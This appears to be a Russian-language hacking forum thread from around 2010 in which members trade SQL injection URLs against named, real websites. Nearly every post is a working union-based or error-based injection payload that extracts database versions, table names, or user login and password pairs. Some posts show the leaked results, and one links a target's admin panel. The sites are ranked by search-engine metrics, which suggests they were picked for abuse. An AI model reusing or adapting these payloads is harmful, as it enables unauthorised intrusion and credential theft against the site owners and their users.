SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. spherics

    spherics Elder - Старейшина

    Joined:
    14 Jan 2008
    Messages:
    190
    Likes Received:
    162
    Reputations:
    25
    http://article-publisher-pro.phparticlescript.com/rss.php?feed&c=199999999+union+select+1,2,3,concat_ws(0x3a,user(),version(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--&n=all&nc=all

    Database Version: 5.0.77-log
    Database name: 428043_article
    User name: [email protected]
     
    1 person likes this.
  2. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.semda.org/info/pyramid.asp?ID=27+union+select+1,2,3,4+from+msysaccessobjects

    http://www.africafiles.org/article.asp?ID=22761+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
     
    _________________________
    #13182 Konqi, 7 Oct 2010
    Last edited: 7 Oct 2010
  3. durito

    durito Elder - Старейшина

    Joined:
    6 Jun 2008
    Messages:
    125
    Likes Received:
    24
    Reputations:
    27
    http://www.behavioralhealthcarenetwork.org/profile_view.php?userid=-42+union+select+CONCAT%28user%28%29,%20CHAR%2832,45,32%29,%20version%28%29%29+--+

    [email protected] - 5.0.91-log
     
  4. cipa21

    cipa21 Elder - Старейшина

    Joined:
    9 Apr 2009
    Messages:
    548
    Likes Received:
    146
    Reputations:
    30
    http://www.vid.net.ua/print.php?id=-20982+union+select+1,2,concat(login,0x3a,password),4,5,6,7,8,9,10,11,12+from+personal+limit+0,1--
     
  5. colorist

    colorist Member

    Joined:
    22 Jun 2009
    Messages:
    0
    Likes Received:
    12
    Reputations:
    15
    лежал под столом :D
    http://nefart.ru/to_friend.php?id=-30004'+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14+--+

    @@version = 5.0.51a-24+lenny3-log
    CY = 50
    PR = 3
     
    #13185 colorist, 8 Oct 2010
    Last edited: 8 Oct 2010
  6. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.lumstyle.ru/company/news.htm?news_id=22+and+1=0+union+Select+1,2,3,4,concat_ws(0x3a,login,pass),6,7+from+user+limit+0,1+--+
    ТИЦ : 450

    http://www.oknacm2.ru/about/news/?year=2010&month=02&id=18+and+1=0+union+select+1,2,3,4,group_concat(table_name),6+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ : 400
     
    #13186 tracy, 8 Oct 2010
    Last edited: 8 Oct 2010
  7. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.arenabusinesscentres.com/home.php?id=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,1,concat_ws(0x3a,password,username),14,15,16,17,18,19,20,21,22+from+users--

    http://www.4railhorsetransport.com/Home.php?id=-2+union+select+1,version()--

    http://www.efimar.com/job.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4,5,6,7+from+information_schema.tables--

    http://www.mri.ur.ru/persons.php?id=-2+union+select+1,2,3,group_concat(0x0b,username,0x3a,user_password,0x3a,user_id),5,6,7+from+phpbb_users--

    http://www.wowbuenosaires.com/zone.php?id=-2+union+select+1,2,3,4,5,group_concat(0x0b,table_name),7,8+from+information_schema.tables--
     
    #13187 Bramin, 8 Oct 2010
    Last edited: 8 Oct 2010
  8. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.iss-reshetnev.ru/?cid=news&nid=1094+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+25,1),1,64),floor(rand(0)*2)))

    ТИЦ : 425 PR: 4
     
    1 person likes this.
  9. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    Code:
    http://www.biznes-pro.com/index.php?page=10&id=15225+and+1=0+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14,version(),16,17--%201
     
    #13189 R1dex, 8 Oct 2010
    Last edited: 10 Oct 2010
    1 person likes this.
  10. CodeSender:)

    CodeSender:) Elder - Старейшина

    Joined:
    29 Jul 2010
    Messages:
    245
    Likes Received:
    115
    Reputations:
    23
    http://www.motifake.com/saveas.php?id=-1+union+select+1,2,3,concat_ws(0x3a,user_name,user_password),5,6,7,8+from+mw_user+--

    Искал прон с lizvicious и попал на этот сервис демотиваторов :rolleyes:

    PR: 4
     
  11. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    http://www.assistancedogs.org.au/news.php?newsid=-17+union+select+1,2,3,group_concat(table_name),5,6+from+information_schema.tables
    http://www.tanger.am/news_all.php?news=5-1+union+select+1,2,3,group_concat(user,char(58),password),5,6+from+admin&lang=rus
    http://www.iwf.net/results/results_results.php?placecod=-116+or+(1,1)=(select+count(0),concat((select+concat_ws(0x3a,name,password)+from+users+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+
    http://bpascal.ru/res/down.php?download=140+and+1=9+union+select+1,version(),3,4,5,6,7,8,9,10
     
    _________________________
    #13191 Konqi, 9 Oct 2010
    Last edited: 9 Oct 2010
  12. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    ЦЕНТРАЛИЗОВАННАЯ БИБЛИОТЕЧНАЯ СИСТЕМА г. САРАТОВА

    http://library.renet.ru/cgi-bin/my_news.pl?cmd=uni&nid=-711+and+1=2+union+select+1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5+--

    4.1.22-log:library@localhost:library:portbld-freebsd6.2
     
  13. KandidaT'S

    KandidaT'S New Member

    Joined:
    9 Jul 2010
    Messages:
    58
    Likes Received:
    3
    Reputations:
    0
    тИЦ: 30
     
  14. Bramin

    Bramin Banned

    Joined:
    15 May 2009
    Messages:
    187
    Likes Received:
    88
    Reputations:
    27
    http://www.upesh.edu.pk/news.php?news_id=-242+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+version()),1),floor(rand(0)*2)))--

    PR 6

    http://www.nortelglass.com/tools.php?id=-2+union+select+1,2,group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12+from+information_schema.tables--

    PR 3
     
    #13194 Bramin, 9 Oct 2010
    Last edited: 10 Oct 2010
    1 person likes this.
  15. AC//DC

    AC//DC Active Member

    Joined:
    28 Jul 2009
    Messages:
    419
    Likes Received:
    147
    Reputations:
    88
    http://goldenflowers.ru/school/articles/?item=-14+and+1=2+union+select+1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6+--

    5.1.41-log : [email protected] : vbuchnev_db : portbld-freebsd7.2
     
    1 person likes this.
  16. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    ТИЦ: 10
    PR: 4
     
  17. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.optsib.ru/?d=2&e9d0ff3e541008&fid=1959+and+1=0+union+select+1,group_concat(table_name+separator+'<br>')+from+information_schema.tables+where+table_schema=database()+--+
    ТИЦ : 350
     
    #13197 tracy, 10 Oct 2010
    Last edited by a moderator: 10 Oct 2010
  18. R1dex

    R1dex Elder - Старейшина

    Joined:
    17 Sep 2008
    Messages:
    255
    Likes Received:
    132
    Reputations:
    19
    http://ukrmodels.com/ru/showgirl.php?id=548'%20and%201=0%20/*!union*/%20select%201,2,3,4,5,6,7,8,9,10,11,12,table_name,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130%20from%20information_schema./*!tables*/%20limit%2035,1--%201

    Украинские модельки )
     
  19. tracy

    tracy Elder - Старейшина

    Joined:
    24 Mar 2009
    Messages:
    244
    Likes Received:
    119
    Reputations:
    40
    http://www.mukola.net/news.php?id=28036'+and+1=0+union+select+1,2,3,group_concat(table_name)+from+information_schema.tables+Where+table_schema=database()+--+

    ТИЦ : 850

    http://pult.com.ua/news.php?id=7466&world=1+or+(select+count(*)from(select+1+union+select+2+union+select+3)x+group+by+concat(mid((select+TABLE_NAME+from+information_schema.tables+where(table_schema!=0x696E666F726D6174696F6E5F736368656D61)limit+8,1),1,64),floor(rand(0)*2)))

    ТИЦ : 90

    http://www.debts.com.ua/news.php?id=25+and+1=0+union+select+1,2,3,group_concat(table_name),5+from+information_schema.tables+Where+Table_schema=database()+--+


    ТИЦ : 20 PR: 4
     
    #13199 tracy, 10 Oct 2010
    Last edited: 10 Oct 2010
  20. Gemini12

    Gemini12 Member

    Joined:
    24 Dec 2008
    Messages:
    58
    Likes Received:
    5
    Reputations:
    0
    http://ontariosafetyleague.com/training.php?id=-2000’+union+select+1,2,3,4,concat_ws(0x3a,version(),database(),user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+--+

    http://ontariosafetyleague.com/admin.php
     
Thread Status:
Not open for further replies.